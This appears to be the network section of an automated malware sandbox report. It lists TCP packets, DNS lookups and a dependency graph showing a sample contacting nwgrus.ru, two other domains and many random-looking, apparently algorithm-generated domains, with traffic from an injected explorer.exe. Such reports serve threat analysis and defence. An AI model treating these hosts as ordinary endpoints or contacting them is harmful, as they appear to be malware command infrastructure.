Oct 12, 2024 23:28:26.030512094 CEST	80	49918	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:26.032141924 CEST	49929	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:26.037065029 CEST	80	49929	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:26.037123919 CEST	49929	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:26.037432909 CEST	49929	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:26.037461042 CEST	49929	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:26.042388916 CEST	80	49929	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:26.042876959 CEST	80	49929	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:27.541810036 CEST	80	49929	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:27.541824102 CEST	80	49929	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:27.541882992 CEST	49929	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:27.542038918 CEST	80	49929	190.224.203.37	192.168.2.4
Oct 12, 2024 23:28:27.542046070 CEST	49929	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:27.542083979 CEST	49929	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:28:27.550081015 CEST	80	49929	190.224.203.37	192.168.2.4
Oct 12, 2024 23:29:36.295078039 CEST	50039	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:29:36.299968958 CEST	80	50039	190.224.203.37	192.168.2.4
Oct 12, 2024 23:29:36.300091028 CEST	50039	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:29:36.300379992 CEST	50039	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:29:36.300434113 CEST	50039	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:29:36.305219889 CEST	80	50039	190.224.203.37	192.168.2.4
Oct 12, 2024 23:29:36.305238008 CEST	80	50039	190.224.203.37	192.168.2.4
Oct 12, 2024 23:29:37.672319889 CEST	80	50039	190.224.203.37	192.168.2.4
Oct 12, 2024 23:29:37.673860073 CEST	80	50039	190.224.203.37	192.168.2.4
Oct 12, 2024 23:29:37.673928022 CEST	50039	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:29:37.673971891 CEST	50039	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:29:37.678750992 CEST	80	50039	190.224.203.37	192.168.2.4
Oct 12, 2024 23:29:43.639626026 CEST	50040	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:29:43.644535065 CEST	80	50040	190.224.203.37	192.168.2.4
Oct 12, 2024 23:29:43.644618988 CEST	50040	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:29:43.644726992 CEST	50040	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:29:43.644790888 CEST	50040	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:29:43.649527073 CEST	80	50040	190.224.203.37	192.168.2.4
Oct 12, 2024 23:29:43.649590969 CEST	80	50040	190.224.203.37	192.168.2.4
Oct 12, 2024 23:29:45.032691002 CEST	80	50040	190.224.203.37	192.168.2.4
Oct 12, 2024 23:29:45.033158064 CEST	80	50040	190.224.203.37	192.168.2.4
Oct 12, 2024 23:29:45.033277988 CEST	50040	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:29:45.034926891 CEST	50040	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:29:45.039638042 CEST	80	50040	190.224.203.37	192.168.2.4
Oct 12, 2024 23:29:51.688133001 CEST	50041	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:29:51.692974091 CEST	80	50041	190.224.203.37	192.168.2.4
Oct 12, 2024 23:29:51.693068981 CEST	50041	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:29:51.693173885 CEST	50041	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:29:51.693207979 CEST	50041	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:29:51.698127985 CEST	80	50041	190.224.203.37	192.168.2.4
Oct 12, 2024 23:29:51.698179007 CEST	80	50041	190.224.203.37	192.168.2.4
Oct 12, 2024 23:29:53.060389996 CEST	80	50041	190.224.203.37	192.168.2.4
Oct 12, 2024 23:29:53.061034918 CEST	80	50041	190.224.203.37	192.168.2.4
Oct 12, 2024 23:29:53.061101913 CEST	50041	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:29:53.061158895 CEST	50041	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:29:53.066035986 CEST	80	50041	190.224.203.37	192.168.2.4
Oct 12, 2024 23:30:01.775891066 CEST	50042	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:30:01.781328917 CEST	80	50042	190.224.203.37	192.168.2.4
Oct 12, 2024 23:30:01.781446934 CEST	50042	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:30:01.781599045 CEST	50042	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:30:01.781599045 CEST	50042	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:30:01.786515951 CEST	80	50042	190.224.203.37	192.168.2.4
Oct 12, 2024 23:30:01.787307978 CEST	80	50042	190.224.203.37	192.168.2.4
Oct 12, 2024 23:30:03.156392097 CEST	80	50042	190.224.203.37	192.168.2.4
Oct 12, 2024 23:30:03.157452106 CEST	80	50042	190.224.203.37	192.168.2.4
Oct 12, 2024 23:30:03.157572031 CEST	50042	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:30:03.157671928 CEST	50042	80	192.168.2.4	190.224.203.37
Oct 12, 2024 23:30:03.162503004 CEST	80	50042	190.224.203.37	192.168.2.4
Oct 12, 2024 23:30:18.602315903 CEST	57093	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:18.608784914 CEST	80	57093	190.220.21.28	192.168.2.4
Oct 12, 2024 23:30:18.608882904 CEST	57093	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:18.609090090 CEST	57093	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:18.609113932 CEST	57093	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:18.614312887 CEST	80	57093	190.220.21.28	192.168.2.4
Oct 12, 2024 23:30:18.614360094 CEST	80	57093	190.220.21.28	192.168.2.4
Oct 12, 2024 23:30:20.228813887 CEST	80	57093	190.220.21.28	192.168.2.4
Oct 12, 2024 23:30:20.228833914 CEST	80	57093	190.220.21.28	192.168.2.4
Oct 12, 2024 23:30:20.228848934 CEST	80	57093	190.220.21.28	192.168.2.4
Oct 12, 2024 23:30:20.229015112 CEST	57093	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:20.229079962 CEST	57093	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:20.233907938 CEST	80	57093	190.220.21.28	192.168.2.4
Oct 12, 2024 23:30:31.673687935 CEST	57094	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:32.180552959 CEST	80	57094	190.220.21.28	192.168.2.4
Oct 12, 2024 23:30:32.180668116 CEST	57094	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:32.180901051 CEST	57094	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:32.180929899 CEST	57094	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:32.185765028 CEST	80	57094	190.220.21.28	192.168.2.4
Oct 12, 2024 23:30:32.185785055 CEST	80	57094	190.220.21.28	192.168.2.4
Oct 12, 2024 23:30:33.635618925 CEST	80	57094	190.220.21.28	192.168.2.4
Oct 12, 2024 23:30:33.636921883 CEST	80	57094	190.220.21.28	192.168.2.4
Oct 12, 2024 23:30:33.637007952 CEST	57094	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:33.637053013 CEST	57094	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:33.641828060 CEST	80	57094	190.220.21.28	192.168.2.4
Oct 12, 2024 23:30:45.457108021 CEST	57095	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:45.462207079 CEST	80	57095	190.220.21.28	192.168.2.4
Oct 12, 2024 23:30:45.462294102 CEST	57095	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:45.462446928 CEST	57095	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:45.462476015 CEST	57095	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:45.467231989 CEST	80	57095	190.220.21.28	192.168.2.4
Oct 12, 2024 23:30:45.467376947 CEST	80	57095	190.220.21.28	192.168.2.4
Oct 12, 2024 23:30:46.931045055 CEST	80	57095	190.220.21.28	192.168.2.4
Oct 12, 2024 23:30:46.931988955 CEST	80	57095	190.220.21.28	192.168.2.4
Oct 12, 2024 23:30:46.932059050 CEST	57095	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:46.932145119 CEST	57095	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:46.937087059 CEST	80	57095	190.220.21.28	192.168.2.4
Oct 12, 2024 23:30:59.553873062 CEST	57096	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:59.558706045 CEST	80	57096	190.220.21.28	192.168.2.4
Oct 12, 2024 23:30:59.558794022 CEST	57096	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:59.558944941 CEST	57096	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:59.558969975 CEST	57096	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:30:59.563759089 CEST	80	57096	190.220.21.28	192.168.2.4
Oct 12, 2024 23:30:59.563775063 CEST	80	57096	190.220.21.28	192.168.2.4
Oct 12, 2024 23:31:01.015340090 CEST	80	57096	190.220.21.28	192.168.2.4
Oct 12, 2024 23:31:01.016155958 CEST	80	57096	190.220.21.28	192.168.2.4
Oct 12, 2024 23:31:01.016369104 CEST	57096	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:31:01.016369104 CEST	57096	80	192.168.2.4	190.220.21.28
Oct 12, 2024 23:31:01.021357059 CEST	80	57096	190.220.21.28	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2024 23:27:32.688499928 CEST	58105	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:27:33.676529884 CEST	58105	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:27:34.708372116 CEST	58105	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:27:34.806319952 CEST	53	58105	1.1.1.1	192.168.2.4
Oct 12, 2024 23:27:34.806361914 CEST	53	58105	1.1.1.1	192.168.2.4
Oct 12, 2024 23:27:34.806395054 CEST	53	58105	1.1.1.1	192.168.2.4
Oct 12, 2024 23:28:36.184603930 CEST	61299	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:28:36.215353966 CEST	53	61299	1.1.1.1	192.168.2.4
Oct 12, 2024 23:28:36.222857952 CEST	60768	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:28:36.252749920 CEST	53	60768	1.1.1.1	192.168.2.4
Oct 12, 2024 23:29:44.950092077 CEST	55132	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:29:44.960016966 CEST	53	55132	1.1.1.1	192.168.2.4
Oct 12, 2024 23:29:44.970916033 CEST	52647	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:29:44.980370045 CEST	53	52647	1.1.1.1	192.168.2.4
Oct 12, 2024 23:29:51.651804924 CEST	63652	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:29:51.683798075 CEST	53	63652	1.1.1.1	192.168.2.4
Oct 12, 2024 23:29:51.698602915 CEST	56428	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:29:51.708811045 CEST	53	56428	1.1.1.1	192.168.2.4
Oct 12, 2024 23:30:00.748212099 CEST	53741	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:30:00.779786110 CEST	53	53741	1.1.1.1	192.168.2.4
Oct 12, 2024 23:30:00.788609982 CEST	62878	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:30:00.819287062 CEST	53	62878	1.1.1.1	192.168.2.4
Oct 12, 2024 23:30:11.593833923 CEST	52154	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:30:11.604468107 CEST	53	52154	1.1.1.1	192.168.2.4
Oct 12, 2024 23:30:11.606856108 CEST	53410	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:30:11.616049051 CEST	53	53410	1.1.1.1	192.168.2.4
Oct 12, 2024 23:30:14.391885996 CEST	55954	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:30:15.385664940 CEST	55954	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:30:15.736234903 CEST	53	55954	1.1.1.1	192.168.2.4
Oct 12, 2024 23:30:18.117928028 CEST	53	55954	1.1.1.1	192.168.2.4
Oct 12, 2024 23:30:23.232620955 CEST	55900	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:30:23.241581917 CEST	53	55900	1.1.1.1	192.168.2.4
Oct 12, 2024 23:30:23.252279043 CEST	50951	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:30:23.283108950 CEST	53	50951	1.1.1.1	192.168.2.4
Oct 12, 2024 23:30:34.874161005 CEST	57587	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:30:35.736176014 CEST	53	57587	1.1.1.1	192.168.2.4
Oct 12, 2024 23:30:35.744683981 CEST	60220	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:30:35.753649950 CEST	53	60220	1.1.1.1	192.168.2.4
Oct 12, 2024 23:30:47.371689081 CEST	60835	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:30:47.381467104 CEST	53	60835	1.1.1.1	192.168.2.4
Oct 12, 2024 23:30:47.392729998 CEST	49461	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:30:47.423365116 CEST	53	49461	1.1.1.1	192.168.2.4
Oct 12, 2024 23:31:00.445220947 CEST	64674	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:31:00.475912094 CEST	53	64674	1.1.1.1	192.168.2.4
Oct 12, 2024 23:31:00.491930962 CEST	63175	53	192.168.2.4	1.1.1.1
Oct 12, 2024 23:31:00.501893044 CEST	53	63175	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 12, 2024 23:27:32.688499928 CEST	192.168.2.4	1.1.1.1	0x4f62	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:33.676529884 CEST	192.168.2.4	1.1.1.1	0x4f62	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.708372116 CEST	192.168.2.4	1.1.1.1	0x4f62	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:28:36.184603930 CEST	192.168.2.4	1.1.1.1	0x74fc	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:28:36.222857952 CEST	192.168.2.4	1.1.1.1	0x57bd	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:29:44.950092077 CEST	192.168.2.4	1.1.1.1	0x2a16	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:29:44.970916033 CEST	192.168.2.4	1.1.1.1	0x805a	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:29:51.651804924 CEST	192.168.2.4	1.1.1.1	0x92f8	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:29:51.698602915 CEST	192.168.2.4	1.1.1.1	0xe8ff	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:00.748212099 CEST	192.168.2.4	1.1.1.1	0x2121	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:00.788609982 CEST	192.168.2.4	1.1.1.1	0x4e8e	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:11.593833923 CEST	192.168.2.4	1.1.1.1	0xb18c	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:11.606856108 CEST	192.168.2.4	1.1.1.1	0x2a6	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:14.391885996 CEST	192.168.2.4	1.1.1.1	0xd3ad	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:15.385664940 CEST	192.168.2.4	1.1.1.1	0xd3ad	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:23.232620955 CEST	192.168.2.4	1.1.1.1	0xbb5d	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:23.252279043 CEST	192.168.2.4	1.1.1.1	0xb383	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:34.874161005 CEST	192.168.2.4	1.1.1.1	0xf969	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:35.744683981 CEST	192.168.2.4	1.1.1.1	0x7447	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:47.371689081 CEST	192.168.2.4	1.1.1.1	0xde56	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:47.392729998 CEST	192.168.2.4	1.1.1.1	0x93f7	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:31:00.445220947 CEST	192.168.2.4	1.1.1.1	0xb5ec	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:31:00.491930962 CEST	192.168.2.4	1.1.1.1	0x7932	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 12, 2024 23:27:34.806319952 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		190.224.203.37	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806319952 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806319952 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		211.202.224.10	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806319952 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		109.98.58.98	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806319952 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		148.230.249.9	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806319952 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		187.211.161.52	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806319952 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		201.191.99.134	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806319952 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		154.144.253.197	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806319952 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		185.18.245.58	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806319952 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		181.123.219.23	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806361914 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		190.224.203.37	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806361914 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806361914 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		211.202.224.10	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806361914 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		109.98.58.98	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806361914 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		148.230.249.9	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806361914 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		187.211.161.52	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806361914 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		201.191.99.134	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806361914 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		154.144.253.197	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806361914 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		185.18.245.58	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806361914 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		181.123.219.23	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806395054 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		190.224.203.37	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806395054 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806395054 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		211.202.224.10	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806395054 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		109.98.58.98	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806395054 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		148.230.249.9	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806395054 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		187.211.161.52	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806395054 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		201.191.99.134	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806395054 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		154.144.253.197	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806395054 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		185.18.245.58	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:27:34.806395054 CEST	1.1.1.1	192.168.2.4	0x4f62	No error (0)	nwgrus.ru		181.123.219.23	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:28:36.215353966 CEST	1.1.1.1	192.168.2.4	0x74fc	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:28:36.252749920 CEST	1.1.1.1	192.168.2.4	0x57bd	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:29:44.960016966 CEST	1.1.1.1	192.168.2.4	0x2a16	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:29:44.980370045 CEST	1.1.1.1	192.168.2.4	0x805a	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:29:51.683798075 CEST	1.1.1.1	192.168.2.4	0x92f8	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:29:51.708811045 CEST	1.1.1.1	192.168.2.4	0xe8ff	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:00.779786110 CEST	1.1.1.1	192.168.2.4	0x2121	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:00.819287062 CEST	1.1.1.1	192.168.2.4	0x4e8e	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:11.604468107 CEST	1.1.1.1	192.168.2.4	0xb18c	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:11.616049051 CEST	1.1.1.1	192.168.2.4	0x2a6	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:18.117928028 CEST	1.1.1.1	192.168.2.4	0xd3ad	No error (0)	nwgrus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:18.117928028 CEST	1.1.1.1	192.168.2.4	0xd3ad	No error (0)	nwgrus.ru		211.181.24.133	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:18.117928028 CEST	1.1.1.1	192.168.2.4	0xd3ad	No error (0)	nwgrus.ru		211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:18.117928028 CEST	1.1.1.1	192.168.2.4	0xd3ad	No error (0)	nwgrus.ru		187.199.203.72	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:18.117928028 CEST	1.1.1.1	192.168.2.4	0xd3ad	No error (0)	nwgrus.ru		185.12.79.25	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:18.117928028 CEST	1.1.1.1	192.168.2.4	0xd3ad	No error (0)	nwgrus.ru		196.189.156.245	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:18.117928028 CEST	1.1.1.1	192.168.2.4	0xd3ad	No error (0)	nwgrus.ru		187.204.42.174	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:18.117928028 CEST	1.1.1.1	192.168.2.4	0xd3ad	No error (0)	nwgrus.ru		180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:18.117928028 CEST	1.1.1.1	192.168.2.4	0xd3ad	No error (0)	nwgrus.ru		78.89.199.216	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:18.117928028 CEST	1.1.1.1	192.168.2.4	0xd3ad	No error (0)	nwgrus.ru		190.220.21.28	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:23.241581917 CEST	1.1.1.1	192.168.2.4	0xbb5d	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:23.283108950 CEST	1.1.1.1	192.168.2.4	0xb383	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:35.736176014 CEST	1.1.1.1	192.168.2.4	0xf969	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:35.753649950 CEST	1.1.1.1	192.168.2.4	0x7447	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:47.381467104 CEST	1.1.1.1	192.168.2.4	0xde56	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:30:47.423365116 CEST	1.1.1.1	192.168.2.4	0x93f7	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:31:00.475912094 CEST	1.1.1.1	192.168.2.4	0xb5ec	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 23:31:00.501893044 CEST	1.1.1.1	192.168.2.4	0x7932	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

23.145.40.164

ddmlqgiwokgjnrjp.com

nwgrus.ru

akwopxbyfda.org

hdugujrhcjt.org

yqqseuuafdwk.org

pkgsugfsxnjdsjfs.com

rwtmirjlqyc.net

qgmuajpjvyrttvq.org

pxoxujlnkixexhr.net

kklpocdpdsv.net

mubqagferfk.net

imnnydowlgvnht.net

jodccroecnfoy.com

nsmlwxtdmapgbt.net

mgjceopkpxepxsq.net

oftgcfgbliielxad.org

drvjksfgomsvmny.net

ecoqiraysyfcwnbl.com

evxjlpqlxbs.org

icaimrqjtfta.com

ulydvxuenfbpuxu.com

gvahueqnuehjgw.net

tfjoxhiuawit.com

fveqebbshittyfl.net

ymhiquwyrvgqovol.org

ydoywfwjttlrcvfk.net

yjtrvkrlityi.net

mjjimnkvahrtrhwm.net

gppslndiqwv.net

gbbsahanxxry.org

qvmvwcqodtkhh.net

wvcoypmusqw.com

drxslflnmsuof.net

juflamsakvad.org

omekhnsmgqeu.net

nkkmigjawaaknrre.org

ewehlvglopwca.org

gnpoohklywxdvf.com

yaiqkdhqwmycp.org

yrsmvamryedsmns.org

vdkygqlrtijypkc.org

blhloseiscjcafeh.com

ficvdttvkapihqjd.org

rydhygdypun.net

tasohhqhxavd.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	190.224.203.37	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
